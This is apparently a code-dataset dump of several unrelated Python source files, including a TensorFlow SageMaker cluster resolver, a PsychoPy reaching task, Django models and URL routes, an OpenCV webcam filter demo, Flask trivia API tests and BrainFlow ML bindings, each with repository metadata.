environment\n self._port = str(port)\n\n @property\n def task_type(self):\n if self._task_type is None:\n task_info = _get_value_in_tfconfig(_TASK_KEY, self._port, {})\n return str(task_info['type']) if 'type' in task_info else None\n else:\n return str(self._task_type)\n\n @property\n def task_id(self):\n if self._task_id is None:\n task_info = _get_value_in_tfconfig(_TASK_KEY, self._port, {})\n return int(task_info['index']) if 'index' in task_info else None\n else:\n return int(self._task_id)\n\n @task_type.setter\n def task_type(self, task_type):\n self._task_type = task_type\n\n @task_id.setter\n def task_id(self, task_id):\n self._task_id = task_id\n\n @property\n def environment(self):\n return self._environment\n\n @property\n def rpc_layer(self):\n if self._rpc_layer is None:\n return _get_value_in_tfconfig(_RPC_LAYER_KEY, self._port)\n else:\n return self._rpc_layer\n\n @rpc_layer.setter\n def rpc_layer(self, rpc_layer):\n self._rpc_layer = rpc_layer\n\n def num_accelerators(self, task_type=None, task_id=None, config_proto=None):\n task_type = self.task_type if task_type is None else task_type\n task_id = self.task_id if task_id is None else task_id\n return super(SageMakerClusterResolver,\n self).num_accelerators(task_type, task_id, config_proto)\n\n def cluster_spec(self):\n \"\"\"Returns a ClusterSpec based on the SageMaker environment variables.\n\n Returns:\n A ClusterSpec with information from the SageMaker environment variables.\n \"\"\"\n tf_config = _load_tf_config(self._port)\n if 'cluster' not in tf_config:\n return ClusterSpec({})\n return ClusterSpec(tf_config['cluster'])\n\n def master(self, task_type=None, task_id=None, rpc_layer=None):\n \"\"\"Returns the master address to use when creating a TensorFlow session.\n\n Note: this is only useful for TensorFlow 1.x.\n\n Args:\n task_type: (String, optional) Overrides and sets the task_type of the\n master.\n task_id: (Integer, optional) Overrides and sets the task id of the master.\n rpc_layer: (String, optional) Overrides and sets the protocol over which\n TensorFlow nodes communicate with each other.\n\n Returns:\n The address of the master.\n\n Raises:\n RuntimeError: If the task_type or task_id is not specified and the\n SageMaker environment variables does not contain a task section.\n \"\"\"\n\n # If `session_master` is set, just use that.\n session_master = _get_value_in_tfconfig(_SESSION_MASTER_KEY, self._port)\n if session_master is not None:\n return session_master\n\n # Return an empty string if we are the only job in the ClusterSpec.\n cluster_spec = self.cluster_spec()\n if (not cluster_spec.jobs or\n (len(cluster_spec.jobs) == 1 and\n len(cluster_spec.job_tasks(cluster_spec.jobs[0])) == 1)):\n return ''\n\n # We try to auto-detect the task type and id, but uses the user-supplied one\n # where available\n task_type = task_type if task_type is not None else self.task_type\n task_id = task_id if task_id is not None else self.task_id\n rpc_layer = rpc_layer if rpc_layer is not None else self.rpc_layer\n\n return format_master_url(\n cluster_spec.task_address(task_type, task_id), rpc_layer)\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/distribute/cluster_resolver/sagemaker_cluster_resolver.py","file_name":"sagemaker_cluster_resolver.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"23819291221","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- bonus\n\nfrom __future__ import absolute_import, division\nfrom psychopy import prefs\nfrom psychopy import gui, visual, core, data, event, logging, colors\nfrom psychopy.constants import (NOT_STARTED, STARTED, STOPPED, FINISHED)\nimport numpy as np\nimport pandas as pd\nfrom psychopy.hardware import keyboard\nfrom IV_functions import (input_dialog, open_window, load_joystick, make_vis_stimuli,\n make_trialMat, ready_phase, target_onset, fore_period, reach_phase, feedback_phase,\n start_splash, bonus_screen,iti_phase, get_serial_port, wait4tr_start, config_eyetracker)\nfrom os import chdir, path\nimport pickle\n#import pylink\n#from EyeLinkCoreGraphicsPsychoPy import EyeLinkCoreGraphicsPsychoPy\n\nchdir('directory/to/where/code/is/saved')\nfmri=False\n\nseq=pd.read_csv('images/sequence1.csv',header=None)\n\npar = {\"expName\":\"IV\",\n \"trials\":len(seq),\n \"trials\":100,\n \"gain\":1.5,\n \"screen_res\":(1680,1050),\n \"screenW\":15*2.54,\n \"dist\":57,\n \"cue_time\":0.2,\n \"regular_bonus\":\"$0.20\",\n \"jackpun_bonus\":\"$1.60\",\n \"target_hold\":0.8,\n \"RT_crit\":1.87,\n \"feedback_time\":1,\n \"text_size\":.05}\n\nvis_par = {\"target1xy\":[-.5,.25],\n \"target2xy\":[.5,.25],\n \"startxy\":[0,-.25],\n \"target_r_deg\":1.2,\n \"cursor_r_deg\":.5,\n \"joy_off\":[0.00684262,0.15542522]}\n\nexpInfo = {\"Participant\" :\"\",\"Session\" :\"\", \"Date\":data.getDateStr()}\ninput_dialog(par,expInfo,visual,gui,core) #Dialog box\nwin,par = open_window(visual,par) #Open a window\n\n#el_tracker,edf_file = config_eyetracker(pylink,expInfo,EyeLinkCoreGraphicsPsychoPy,win,visual,path,event)\n#el_tracker.openDataFile(edf_file)\n#el_tracker.startRecording(1, 1, 1, 1)\n\n##WILL NOW WAIT FOR SCANNER TRIGGER\n\nif fmri:\n serial_port = get_serial_port()\n first_tr = wait4tr_start(serial_port[0],core)\nelse:\n first_tr = core.getTime()\npar[\"first_tr\"]=first_tr\n\njoy = load_joystick() #Load joystick\n\nimgComponents,cursor,vis_par,cues,feedback,bonus = make_vis_stimuli(visual,win,vis_par,par) #Make visual stimuli\n\ntrialMat,bonuses = make_trialMat(par,np,pd,par[\"trials\"])\n\ntrial_pars = []\n\ncursor = start_splash(win,imgComponents,cursor,par,vis_par,joy,core,visual,np,'to begin, move cursor away from start position')\n\nfor trial in range(0,par[\"trials\"]):\n \n trial_par = {\"targetxy\":vis_par[trialMat.targetxy[trial]],\n \"cue\":seq.iloc[trial,0]-1,\n \"bonus\":bonuses[seq.iloc[trial,0]-1],\n \"start_hold\":seq.iloc[trial,1],\n \"forep\":seq.iloc[trial,2],\n \"jumped_gun\":0}\n \n cursor,trial_par = iti_phase(win,imgComponents,cursor,par,vis_par,joy,core,np,trial_par)\n \n cursor,trial_par = ready_phase(win,imgComponents,cursor,par,vis_par,joy,core,np,trial_par)\n #print(np.diff(trial_par[\"ready_vbl\"]))\n \n cursor,trial_par = target_onset(win,imgComponents,cursor,par,vis_par,joy,core,np,trial_par,cues)\n #print(np.diff(trial_par[\"onset_vbl\"]))\n #print(trial_par[\"onset_vbl\"][0]-trial_par[\"ready_vbl\"][-1])\n \n if trial_par[\"jumped_gun\"] == 0:\n cursor,trial_par = fore_period(win,imgComponents,cursor,par,vis_par,joy,core,np,trial_par)\n #print(np.diff(trial_par[\"fore_vbl\"]))\n #print(trial_par[\"fore_vbl\"][0]-trial_par[\"onset_vbl\"][-1])\n \n if trial_par[\"jumped_gun\"] == 0:\n cursor,trial_par = reach_phase(win,imgComponents,cursor,par,vis_par,joy,core,np,trial_par)\n #print(np.diff(trial_par[\"reach_vbl\"]))\n #print(trial_par[\"reach_vbl\"][0]-trial_par[\"fore_vbl\"][-1])\n \n cursor,trial_par = feedback_phase(win,imgComponents,cursor,par,vis_par,joy,core,np,trial_par,feedback,bonus)\n #print(np.diff(trial_par[\"feedb_vbl\"]))\n #print(trial_par[\"feedb_vbl\"][0]-trial_par[\"reach_vbl\"][-1])\n \n trial_pars.append(trial_par)\n\ntrial_pars.append(par)\ntrial_pars.append(vis_par)\n\nimport pickle\nfile_out=\"Data/\"+expInfo[\"Participant\"]+'_Session'+expInfo[\"Session\"]+\"_\"+expInfo[\"Date\"]\nwith open(file_out,\"wb\") as fp:\n pickle.dump(trial_pars, fp)\n\nif expInfo[\"Session\"]=='4':\n bonus_screen(win,par,vis_par,core,visual,np,event,expInfo,imgComponents,cursor)\n\n#local_edf='/Users/asap1/Desktop/IV_task_fMRI/eyeData/'+edf_file\n#el_tracker.receiveDataFile(edf_file, local_edf)\n#el_tracker.closeDataFile()\n#el_tracker.stopRecording()\n#el_tracker.close()\n","repo_name":"dundonnm/incentivized-vigor-task","sub_path":"task_code/IV_task.py","file_name":"IV_task.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72095975399","text":"# -*- coding: utf-8 -*-\n\nfrom typing import Dict, Any\n\nimport os\nimport pkg_resources\n\nfrom bag.design import Module\n\n\nyaml_file = pkg_resources.resource_filename(__name__, os.path.join('netlist_info',\n 'inv_chain.yaml'))\n\n\n# noinspection PyPep8Naming\nclass bag_digital_ec__inv_chain(Module):\n \"\"\"Module for library bag_digital_ec cell inv_chain.\n\n Fill in high level description here.\n \"\"\"\n\n def __init__(self, bag_config, parent=None, prj=None, **kwargs):\n Module.__init__(self, bag_config, yaml_file, parent=parent, prj=prj, **kwargs)\n\n @classmethod\n def get_params_info(cls):\n # type: () -> Dict[str, str]\n return dict(\n lch='channel length.',\n wp_list='PMOS widths.',\n wn_list='NMOS widths.',\n thp='PMOS threshold.',\n thn='NMOS threshold.',\n segp_list='PMOS segments.',\n segn_list='NMOS segments.',\n stack_list='list of stack parameters for each inverter.',\n dum_info='Dummy information data structure.',\n )\n\n @classmethod\n def get_default_param_values(cls):\n # type: () -> Dict[str, Any]\n return dict(\n stack_list=None,\n dum_info=None,\n )\n\n def get_master_basename(self):\n segn_list = self.params['segn_list']\n return 'inv_chain_n%d_%dx' % (len(segn_list), segn_list[-1])\n\n def design(self, lch, wp_list, wn_list, thp, thn, segp_list, segn_list, stack_list, dum_info):\n ninv = len(wp_list)\n if not stack_list:\n stack_list = [False] * ninv\n name_list, term_list = [], []\n for idx in range(ninv):\n name_list.append('XINV%d' % idx)\n if idx == 0:\n in_name = 'in'\n else:\n in_name = 'mid<%d>' % (idx - 1)\n if idx == ninv - 1:\n out_name = 'out'\n else:\n out_name = 'mid<%d>' % idx\n term_list.append({'in': in_name, 'out': out_name})\n\n self.array_instance('XINV', name_list, term_list=term_list)\n for idx, (wp, wn, segp, segn, stack) in enumerate(zip(wp_list, wn_list, segp_list,\n segn_list, stack_list)):\n self.instances['XINV'][idx].design(lch=lch, wp=wp, wn=wn, thp=thp, thn=thn,\n segp=segp, segn=segn, stack=stack)\n\n self.design_dummy_transistors(dum_info, 'XDUM', 'VDD', 'VSS')\n","repo_name":"xyabc/bag_digital_ec","sub_path":"BagModules/bag_digital_ec/inv_chain.py","file_name":"inv_chain.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7074619745","text":"from django.db import models\nfrom datetime import datetime\nfrom manage import init_django\n\ninit_django()\n\nMONTH_CHOICES = (\n (1, \"January\"), (2, \"February\"),\n (3, \"March\"), (4, \"April\"),\n (5, \"May\"), (6, \"June\"),\n (7, \"July\"), (8, \"August\"),\n (9, \"September\"), (10, \"October\"),\n (11, \"November\"), (12, \"Decemberry\")\n )\n\nclass Accrual(models.Model):\n date = models.DateTimeField()\n month = models.PositiveSmallIntegerField(null=True, choices=MONTH_CHOICES)\n \n def save(self, *args, **kwargs):\n # достали месяц из даты\n self.month = datetime.strptime(self.date, \"%Y-%m-%d\").month\n super(Accrual, self).save(*args, **kwargs)\n \n\nclass Payment(models.Model):\n # связь один к одному из условий задачи\n accrual = models.OneToOneField(Accrual, null=True, on_delete=models.SET_NULL, related_name='payment')\n\n date = models.DateTimeField()\n month = models.PositiveSmallIntegerField(null=True, choices=MONTH_CHOICES)\n\n def save(self, *args, **kwargs):\n # месяц из даты\n self.month = datetime.strptime(self.date, \"%Y-%m-%d\").month\n\n try:\n\n # опущено условие про месяц, \n # потому что условий про самый старый включает месяц\n # 1 - фильтруем по неоплаченным счетам\n # 2 - фильтруем по прошедшей дате\n # 3 - сортируем по дате\n # 4 - берём первое\n self.accrual = Accrual.objects.filter(payment=None, date__lte = self.date).order_by('date').last()\n super(Payment, self).save()\n \n except Exception as e:\n # если возникло исключение оставляем пустым\n self.accrual = None\n super(Payment, self).save()\n \n","repo_name":"Alexander671/test_unified_information_system","sub_path":"task2/accrual/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10143616434","text":"\"\"\"movie_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import patterns, include, url\n#from django.contrib import admin\nfrom django.contrib import admin\nfrom MovieLib import views\nfrom MovieLib.views import *\n\nfrom django.contrib.auth.views import login, logout\n\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'movie_project.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^chinna/', include(admin.site.urls)),\n #url(r'^movie_list/$', views.ListView.as_view(), name='movie_index'),\n #url(r'^$', 'MovieLib.views.index'),\n url(r'^$', include('MovieLib.urls', namespace=\"MovieLib\")), #index method inside /MovieLib/views.py will handle the `/` request \n \n #url(r'^create/$', 'MovieLib.views.Create', name='movie_create'),\n url(r'^index/$', views.ListView.as_view(), name='movie_index'),\n\n url(r'^create/$', views.CreateView.as_view(), name='movie_create'), \n url(r'^home/$', views.IndexView.as_view(), name='movie_home'),\n url(r'^movie_list/$', views.ListView.as_view(), name='movie_list'),\n url(r'^edit/(?P\\d+)$', views.UpdateView.as_view(), name='movie_edit'),\n url(r'^delete/(?P\\d+)$', views.DeleteView.as_view(), name='movie_delete'),\n\n url(r'^about_us/$', 'MovieLib.views.about', name='movie_about'),\n url(r'^contact/$', 'MovieLib.views.contact', name='movie_contact'),\n # url(r'^index/$', 'MovieLib.views.logout', name='movie_logout'),\n url(r'^logout/$', 'MovieLib.views.logout', name='movie_logout'),\n url(r'^base_page/$', 'MovieLib.views.base', name='movie_base'),\n #url(r'^movie_list/$', 'MovieLib.views.cancel', name='movie_cancel'),\n \n #url(r'^login/$', 'MovieLib.views.login', name='movie_login'),\n \n # url(r'^$', 'django.contrib.auth.views.login'),\n url(r'^logout/$', 'MovieLib.views.logout', name='movie_logout'),\n url(r'^accounts/login/$', 'django.contrib.auth.views.login'), # If user is not login it will redirect to login page\n url(r'^login/$', 'MovieLib.views.login', name='movie_login'),\n\n url(r'^register/$', 'MovieLib.views.register', name='movie_register'),\n url(r'^register/success/$','MovieLib.views.register_success', name='movie_register'),\n\n \n\n\n)\n\n","repo_name":"chinnag0011/sample","sub_path":"movie_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22492491766","text":"import easyProve as ep\nimport fact\n\nA = ep.point('A')\nB = ep.point('B')\nC = ep.point('C')\nABC = ep.triangle('ABC', A, B, C)\n\nB_ = ep.point(\"B'\")\nC_ = ep.point(\"C'\")\n\nangle_BAB_= ep.angle(\"BAB'\", B, A, B_)\nangle_CAC_= ep.angle(\"CAC'\", C, A, C_)\n\nep.addRule(fact.AddEq(180, angle_BAB_, angle_CAC_))\nD = ep.point('D')\nep.addRule(fact.IsMidPoint(D, B_, C_))\n\nAD = ep.lineSeg('AD', A, D)\nBC = ep.lineSeg('BC', B, C)\n\nep.infer()\nep.ask(fact.DivEq(ep.what, AD, BC))\n","repo_name":"sg-first/easyProve","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14679284711","text":"# Importamos las librerias\r\nimport cv2\r\nimport numpy as np\r\n\r\n# Modos de ejecucion\r\n#vc = 0 --> 48 # Captura de video\r\n#fd = 1 --> 49 # Filtro desenfoque\r\n#fe = 2 --> 50 # Filtro detector de esquinas\r\n#fb = 3 --> 51 # Filtro de Bordes\r\n\r\n\r\n# Parametros para detector de esquinas\r\nesquinas_param = dict(maxCorners = 500, # Maximo numero de esquinas a detectar\r\n qualityLevel = 0.2, # Umbral minimo para la deteccion de esquinas\r\n minDistance = 15, # Distacia entre pixeles\r\n blockSize = 9) # Area de pixeles\r\n\r\n# Modo\r\nmood = 48\r\n\r\n# Creamos la Video Captura\r\ncap = cv2.VideoCapture(0)\r\n\r\n# Creamos un ciclo para ejecutar nuestros Frames\r\nwhile True:\r\n # Leemos los fotogramas\r\n ret, frame = cap.read()\r\n\r\n # Decidimos el mood\r\n # Normal\r\n if mood == 48:\r\n # Mostramos los frames\r\n resultado = frame\r\n\r\n # Desenfoque\r\n elif mood == 49:\r\n # Modificamos frames\r\n resultado = cv2.blur(frame, (13, 13))\r\n\r\n # Bordes\r\n elif mood == 51:\r\n # Modificamos frames\r\n resultado = cv2.Canny(frame, 135, 150) # Umbral superior y umbral inferior\r\n\r\n # Esquinas\r\n elif mood == 50:\r\n # Obtenemos los frames\r\n resultado = frame\r\n # Conversion a escala de grises\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n # Calculamos las caracteristicas de las esquinas\r\n esquinas = cv2.goodFeaturesToTrack(gray, **esquinas_param)\r\n\r\n # Preguntamos si detectamos esquinas con esas caracteristicas\r\n if esquinas is not None:\r\n # Iteramos\r\n for x, y in np.float32(esquinas).reshape(-1,2):\r\n # Convertimos en enteros\r\n x,y = int(x), int(y)\r\n # Dibujamos la ubicacion de las esquinas\r\n cv2.circle(resultado, (x,y), 10, (255,0,0), 1)\r\n\r\n # Si presionamos otra tecla\r\n elif mood != 48 or mood != 49 or mood != 50 or mood != 51 or mood != -1:\r\n # No hacemos nada\r\n resultado = frame\r\n\r\n # Imprimimos mensaje\r\n print('TECLA INCORRECTA')\r\n\r\n\r\n # Mostramos los Frames\r\n cv2.imshow(\"VIDEO CAPTURA\", resultado)\r\n\r\n # Cerramos con lectura de teclado\r\n t = cv2.waitKey(1)\r\n # Salimos\r\n if t == 27:\r\n break\r\n # Modificamos Mood\r\n elif t != -1:\r\n mood = t\r\n\r\n# Liberamos la VideoCaptura\r\ncap.release()\r\n# Cerramos la ventana\r\ncv2.destroyAllWindows()\r\n","repo_name":"AprendeIngenia/Tecnicas-de-Procesamiento-en-Tiempo-real","sub_path":"ProcesamientoRT.py","file_name":"ProcesamientoRT.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"es","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"71082361732","text":"#!/usr/bin/env python3\n\nimport sys\n\nelfPacks = []\ncurrPack = 0\n\nfor line in sys.stdin:\n line = line.strip()\n if line == \"\":\n elfPacks.append(currPack)\n currPack = 0\n else:\n currPack += int(line)\n\nif currPack != 0:\n elfPacks.append(currPack)\n\nelfPacks.sort()\n\nprint(\"The largest pack is: {}\".format(elfPacks[len(elfPacks) - 1]))\n\ntopCount = 3\ntotal = 0\n\nfor _, val in enumerate(elfPacks[len(elfPacks) - topCount:]):\n total += val\n\nprint(\"The top {#010d} elves have a total of {}\".format(topCount, total))\n","repo_name":"RileyRaschke/adventofcode","sub_path":"2022/d01/day01.py","file_name":"day01.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"42189861422","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flaskr import create_app\nfrom models import setup_db, Question, Category\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n #Executed before each test\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n \n #setting up secrets from virtual environment\n self.database_user = os.getenv(\"DB_USER\")\n self.database_password = os.getenv(\"DB_PASSWORD\")\n self.database_path = 'postgresql://{}:{}@{}/{}'.format(self.database_user, self.database_password, 'localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n\n # sample question for use in tests\n self.new_question = {\n \"answer\": \"Repunzul\", \n \"category\": 4, \n \"difficulty\": 2, \n \"question\": \"Which disney character has the longest hair?\"\n }\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n \n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n \"\"\"\n TODO\n Write at least one test for each test for successful operation and for expected errors.\n \"\"\" \n #---------- GET Categories ----------\n # Success\n def test_get_categories(self):\n #condition\n res = self.client().get(\"/categories\")\n data = json.loads(res.data)\n\n # check status code and message\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data[\"success\"], True)\n self.assertTrue(data[\"categories\"])\n self.assertTrue(data[\"total_categories\"])\n # Fail\n def test_error_404_get_categories(self):\n #condition\n res = self.client().patch('/categories/1')\n data = json.loads(res.data)\n\n # check status code and message\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['error'], 404)\n self.assertEqual(data['message'], \"Not found\")\n self.assertEqual(data['success'], False)\n\n #---------- GET Questions (paginated) ----------\n # Success\n def test_get_questions_paginated(self):\n #condtion\n res = self.client().get('/questions')\n data = json.loads(res.data)\n\n # check status code and message\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['total_questions'])\n self.assertTrue(len(data['questions']))\n\n # Fail\n def test_404_request_beyond_valid_page(self):\n #condition \n res = self.client().get('/questions?page=90') #if out of range\n data = json.loads(res.data)\n\n # check status code and message\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Not found')\n \n #---------- DELETE Questions ----------\n # Success\n \n def test_delete_question(self):\n #condtion\n res = self.client().delete(\"/questions/17\")\n data = json.loads(res.data)\n #return question from database\n question = Question.query.filter(Question.id == 17).one_or_none()\n \n # check status code and message\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data[\"success\"], True)\n self.assertEqual(data[\"deleted\"], 17)\n self.assertTrue(data[\"total_questions\"])\n self.assertTrue(len(data[\"questions\"]))\n self.assertEqual(question, None)\n \n # Fail\n def test_422_if_question_does_not_exist(self):\n # Success\n res = self.client().delete(\"/questions/90\")\n data = json.loads(res.data)\n \n # check status code and message\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data[\"success\"], False)\n self.assertEqual(data[\"message\"], \"unprocessable\")\n \n #---------- POST new Question ----------\n # Success\n def test_create_new_question(self):\n #condition\n res = self.client().post(\"/questions\", json=self.new_question)\n data = json.loads(res.data)\n\n # check status code and message\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data[\"success\"], True)\n self.assertTrue(data[\"created\"])\n self.assertTrue(data[\"question_created\"])\n self.assertTrue(len(data[\"questions\"]))\n \n # Fail\n def test_404_if_question_creation_not_valid(self):\n res = self.client().post(\"/books/45\", json={\"answer\": \"Repunzul\"})\n #incomplete fields\n data = json.loads(res.data)\n\n # check status code and message\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data[\"success\"], False)\n self.assertEqual(data[\"message\"], \"Not found\") \n\n \n #---------- POST search Question ----------\n # Success\n def test_search_questions(self):\n # send post request with search term\n res = self.client().post('/questions',\n json={'searchTerm': 'title'})\n # conditions\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n\n # check if one of correct matches is included in response\n self.assertEqual(data['questions'][0]['id'], 5)\n \n # Fail\n def test_404_if_search_questions_fails(self):\n response = self.client().post('/questions',\n json={'searchTerm': ''})\n\n #condition\n data = json.loads(response.data)\n\n # check response\n self.assertEqual(response.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Not found')\n\n \n #---------- GET Questions (based on category) ----------\n # Success \n def test_get_questions_by_category(self):\n #condition\n res = self.client().get('/categories/2/questions') #for category id=2 \n data = json.loads(res.data)\n\n # response status code and message\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertNotEqual(len(data['questions']), 0)\n \n # Fail\n def test_400_if_questions_by_category_fails(self):\n #condition\n res = self.client().get('/categories/10/questions') #Category out of range 1-6\n data = json.loads(res.data)\n\n # response status code and message\n self.assertEqual(res.status_code, 400)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'bad request')\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"HafseeMan/Trivia-project","sub_path":"backend/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":7081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72578005253","text":"import ctypes\nimport enum\nimport json\nimport os\nimport platform\nimport struct\nfrom typing import List\n\nimport numpy\nimport pkg_resources\nfrom brainflow.board_shim import BrainFlowError, LogLevels\nfrom brainflow.exit_codes import BrainFlowExitCodes\nfrom nptyping import NDArray\nfrom numpy.ctypeslib import ndpointer\n\n\nclass BrainFlowMetrics(enum.IntEnum):\n \"\"\"Enum to store all supported metrics\"\"\"\n\n MINDFULNESS = 0 #:\n RESTFULNESS = 1 #:\n USER_DEFINED = 2 #:\n\n\nclass BrainFlowClassifiers(enum.IntEnum):\n \"\"\"Enum to store all supported classifiers\"\"\"\n\n DEFAULT_CLASSIFIER = 0 #:\n DYN_LIB_CLASSIFIER = 1 #:\n ONNX_CLASSIFIER = 2 #:\n\n\nclass BrainFlowModelParams(object):\n \"\"\" inputs parameters for prepare_session method\n\n :param metric: metric to calculate\n :type metric: int\n :param classifier: classifier to use\n :type classifier: int\n :param file: file to load model\n :type file: str\n :param other_info: additional information\n :type other_info: str\n :param output_name: output node name\n :type output_name: str\n :param max_array_size: max array size to preallocate\n :type max_array_size: int\n \"\"\"\n\n def __init__(self, metric, classifier) -> None:\n self.metric = metric\n self.classifier = classifier\n self.file = ''\n self.other_info = ''\n self.output_name = ''\n self.max_array_size = 8192\n\n def to_json(self) -> None:\n return json.dumps(self, default=lambda o: o.__dict__,\n sort_keys=True, indent=4)\n\n\nclass MLModuleDLL(object):\n __instance = None\n\n @classmethod\n def get_instance(cls):\n if cls.__instance is None:\n cls.__instance = cls()\n return cls.__instance\n\n def __init__(self):\n if platform.system() == 'Windows':\n if struct.calcsize(\"P\") * 8 == 64:\n dll_path = 'lib\\\\MLModule.dll'\n else:\n dll_path = 'lib\\\\MLModule32.dll'\n elif platform.system() == 'Darwin':\n dll_path = 'lib/libMLModule.dylib'\n else:\n dll_path = 'lib/libMLModule.so'\n full_path = pkg_resources.resource_filename(__name__, dll_path)\n if os.path.isfile(full_path):\n # for python we load dll by direct path but this dll may depend on other dlls and they will not be found!\n # to solve it we can load all of them before loading the main one or change PATH\\LD_LIBRARY_PATH env var.\n # env variable looks better, since it can be done only once for all dependencies\n dir_path = os.path.abspath(os.path.dirname(full_path))\n try:\n os.add_dll_directory(dir_path)\n except:\n pass\n if platform.system() == 'Windows':\n os.environ['PATH'] = dir_path + os.pathsep + os.environ.get('PATH', '')\n else:\n os.environ['LD_LIBRARY_PATH'] = dir_path + os.pathsep + os.environ.get('LD_LIBRARY_PATH', '')\n self.lib = ctypes.cdll.LoadLibrary(full_path)\n else:\n raise FileNotFoundError(\n 'Dynamic library %s is missed, did you forget to compile brainflow before installation of python package?' % full_path)\n\n self.set_log_level_ml_module = self.lib.set_log_level_ml_module\n self.set_log_level_ml_module.restype = ctypes.c_int\n self.set_log_level_ml_module.argtypes = [\n ctypes.c_int\n ]\n\n self.set_log_file_ml_module = self.lib.set_log_file_ml_module\n self.set_log_file_ml_module.restype = ctypes.c_int\n self.set_log_file_ml_module.argtypes = [\n ctypes.c_char_p\n ]\n\n self.log_message_ml_module = self.lib.log_message_ml_module\n self.log_message_ml_module.restype = ctypes.c_int\n self.log_message_ml_module.argtypes = [\n ctypes.c_int,\n ctypes.c_char_p\n ]\n\n self.prepare = self.lib.prepare\n self.prepare.restype = ctypes.c_int\n self.prepare.argtypes = [\n ctypes.c_char_p\n ]\n\n self.release = self.lib.release\n self.release.restype = ctypes.c_int\n self.release.argtypes = [\n ctypes.c_char_p\n ]\n\n self.release_all = self.lib.release_all\n self.release_all.restype = ctypes.c_int\n self.release_all.argtypes = []\n\n self.predict = self.lib.predict\n self.predict.restype = ctypes.c_int\n self.predict.argtypes = [\n ndpointer(ctypes.c_double),\n ctypes.c_int,\n ndpointer(ctypes.c_double),\n ndpointer(ctypes.c_int32),\n ctypes.c_char_p\n ]\n\n self.get_version_ml_module = self.lib.get_version_ml_module\n self.get_version_ml_module.restype = ctypes.c_int\n self.get_version_ml_module.argtypes = [\n ndpointer(ctypes.c_ubyte),\n ndpointer(ctypes.c_int32),\n ctypes.c_int\n ]\n\n\nclass MLModel(object):\n \"\"\"MLModel class used to calc derivative metrics from raw data\n\n :param model_params: Model Params\n :type model_params: BrainFlowModelParams\n \"\"\"\n\n def __init__(self, model_params: BrainFlowModelParams) -> None:\n self.model_params = model_params\n try:\n self.serialized_params = model_params.to_json().encode()\n except BaseException:\n self.serialized_params = model_params.to_json()\n\n @classmethod\n def set_log_level(cls, log_level: int) -> None:\n \"\"\"set BrainFlow log level, use it only if you want to write your own messages to BrainFlow logger,\n otherwise use enable_ml_logger, enable_dev_ml_logger or disable_ml_logger\n\n :param log_level: log level, to specify it you should use values from LogLevels enum\n :type log_level: int\n \"\"\"\n res = MLModuleDLL.get_instance().set_log_level_ml_module(log_level)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to enable logger', res)\n\n @classmethod\n def enable_ml_logger(cls) -> None:\n \"\"\"enable ML Logger with level INFO, uses stderr for log messages by default\"\"\"\n 